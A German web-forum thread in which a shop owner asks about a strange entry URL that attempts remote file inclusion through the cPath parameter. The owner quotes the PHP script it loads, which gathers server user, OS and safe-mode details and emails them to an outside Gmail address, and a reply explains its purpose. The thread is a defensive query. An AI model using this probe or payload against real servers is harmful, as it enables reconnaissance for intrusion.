Merkwürdige Eintrittsseite

[Andulus]

/modified eCommerce Shopsoftwareod/index.php?cPath=http://www.rolandstu...../rico.txt?

Ich finde dann unter der Adresse [LINK ENTFERNT1]
folgendes php script:

Code: PHP  [Auswählen]

<?php
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "promocional2011@gmail.com";
$assunto = "RICO RICO";
$email1 = "promocional2011@gmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>

Was machst das?

Gruß Andreas
(modified eCommerce Shopsoftware v1.03 dated: 2010-01-04)

 [EDIT: h-h-h Trojaner-Link entfernt]

Linkback: https://www.modified-shop.org/forum/index.php?topic=15309.0

[Matt]

Das erzählt dem Angreifer ein bisschen was über deinen Server per Mail. Dazu muss der Angriff aber erfolgreich sein, mir ist derzeit aber kein Exploit bekannt, der über den Kategorie-Parameter eine externe Datei einbinden würde.